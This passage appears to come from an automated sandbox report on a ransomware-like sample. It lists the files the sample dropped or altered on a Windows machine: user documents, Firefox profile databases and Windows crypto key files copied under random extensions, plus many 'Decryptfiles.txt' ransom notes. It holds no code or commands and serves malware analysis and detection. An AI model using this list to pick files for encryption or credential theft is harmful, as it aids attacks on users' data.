ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT.PjJC
|
data
|
dropped
|
||
C:\Users\user\NTUSER.DAT.puvR
|
data
|
dropped
|
||
C:\Users\user\OneDrive\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Camera Roll\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Pictures\Saved Pictures\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Recent\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Saved Games\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms
|
data
|
dropped
|
||
C:\Users\user\Videos\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\_curlrc.QhjT
|
Dyalog APL version -3.87
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.qsaN
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG1.zFIM
|
data
|
dropped
|
||
C:\Users\user\ntuser.dat.LOG2.yVIk
|
data
|
modified
|
||
C:\Users\user\ntuser.dat.LOG2.yrbT
|
data
|
dropped
|
||
C:\Users\user\ntuser.ini
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x26d1c33e, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\Users\Public\Libraries\RecordedTV.library-ms.BDVt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.xNOk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.HWrg (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl.iPBU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl.Mezk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_store.rAxY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storei.lQYq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\ES_session_storek.oCne (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata.JDcj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMDocs.sav.jmtu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\TMGrpPrm.sav.PdQk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_9e146be9-c76a-4720-bcdb-53011b87bd06.yGUV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\CREDHIST.fviB (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\0837c0eb-5e12-485a-b8a4-e50f73c1d92b.BqDM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\Preferred.lPQT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms.fmAg (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms.dtbr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms.JjBl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms.gtXP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms.qpCH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms.fjtG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AQRFEVRTGL.png.krjt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\5f7b5f1e01b83767.automaticDestinations-ms.yVvX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.ONrF (copy)
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BQJUWOYRTO.jpg.WIXo (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BUFZSQPCOH.png.oKLT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWETZDQDIB.mp3.plQN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BYIMNPJCRL.png.BRUx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.docx.VXkw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DUKNXICOZT.pdf.wdfC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.docx.hAlF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.jpg.eprR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DWTHNHNNJB.xlsx.XUBO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.jpg.oygr (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.mp3.gBKv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFDEXQWKNW.pdf.GOHi (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.docx.iHFZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.mp3.dgJj (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GNLQNHOLWB.xlsx.cbGq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.docx.eHcO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.jpg.PcmU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HMPPSXQPQV.xlsx.TmlY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HQJBRDYKDE.png.brqN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\HTQYAMNJFK.mp3.ObNa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.jpg.OToE (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\IYEPUIQXSK.xlsx.tPvz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.docx.VuIG (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LFOPODGVOH.xlsx.TYgz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.jpg.HgaQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LHEPQPGEWF.mp3.qtgv (copy)
|
byte-swapped Berkeley vfont data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.docx.qDQu (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.pdf.BOKH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MSTILBICVO.pdf.bpoX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NFUBSOKSVH.png.caCH (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NRIABABLWZ.png.KiBF (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.mp3.mXhC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.pdf.iSWK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\OOJWCGHFZE.xlsx.bWXN (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PWZOQIFCAN.png.lpiM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.jpg.ayzY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QFAPOWPAFG.xlsx.LzAp (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.docx.QjXA (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\SNIPGPPREP.pdf.WqNa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UJDGSZVRAQ.png.Wkpw (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\UNKRLCVOHV.docx.VOgz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.jpg.iEbY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.mp3.DomY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.pdf.eJLy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VWDFPKGDUF.xlsx.NJLe (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\YZHONYFSCD.mp3.gWZR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNK.GuUT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini.SUVD (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini.jqFt (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.apWv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.qZrs (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.tiVb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jaxC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\AlternateServices.txt.PFak (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\ExperimentStoreData.json.IOon (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\SiteSecurityServiceState.txt.KBUz (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4.DHML (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.json.IABP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db.lDFx (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.ini.Klgc (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.json.QTxO (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite.NIxU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm.LVWf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite.faxb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690337.3be89113-af2b-4b48-9c47-40ac1156f7a2.new-profile.jsonlz4.SEKQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690340.2824c836-2afd-4a95-940b-ed2b991ba55d.event.jsonlz4.rPjI (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4.LCHo (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4.xgqC (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695562.2c8e5eea-375d-48a9-ad4c-be583ff1215d.health.jsonlz4.pEyQ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4.ZKhS (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695610.18a05d94-e006-440f-b702-3e398a280dbf.health.jsonlz4.HkoK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695614.edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.main.jsonlz4.AJya (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.bin.sYuZ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-update.IVvW (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\events.VmMX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5fa.BZNT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\01e461df-d85d-4561-a852-205de2d67f32.XnMa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65.sEqP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208.IVfa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fba.jsbL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\372e391e-787d-40e8-8beb-44106d6c22f4.Ehqb (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5c.chVM (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\58b46d46-b146-420f-81af-5b32c19a8aef.qHVn (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\59bd13a9-8183-4ac7-8723-9621ae6d3748.gPKv (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993.Lbdi (copy)
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76.KTkf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7.Ohus (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7.lDGy (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7917ce80-55b3-46ca-99c2-70537bbb959a.iWVk (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855.Mikq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7b2ddd96-6d27-491a-a7e0-811ed320f1f0.nmQe (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4.nMDK (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5.QmZW (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\c64980e6-c743-4793-ba4a-89f593d4eb16.zNJW (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5d.efHJ (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\f5c2d345-4cad-4c1a-a51d-15d682036066.JqUn (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.json.gUXa (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.json.gSRq (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.json.WeZA (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extensions.json.bZyd (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite.HCyL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db.fphL (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqlite.pWQj (copy)
|
OpenPGP Secret Key
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\pkcs11.txt.lWUP (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm.RDpm (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite.MCJU (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js.JDCT (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\protections.sqlite.gzih (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\18a05d94-e006-440f-b702-3e398a280dbf.kuBI (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2824c836-2afd-4a95-940b-ed2b991ba55d.yagD (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\2c8e5eea-375d-48a9-ad4c-be583ff1215d.zkga (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2.LvSr (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75.Obuv (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6786f292-c1be-4996-99cd-77aa855c1844.YKcf (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19f.qhMV (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27.CekY (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4.mlQR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\Decryptfiles.txt
|
ASCII text, with very long lines (3354), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json.OUln (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4.jeiX (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528.bEoR (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4.xMDl (copy)
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\shield-preference-experiments.json
|
data
|
dropped
|
||
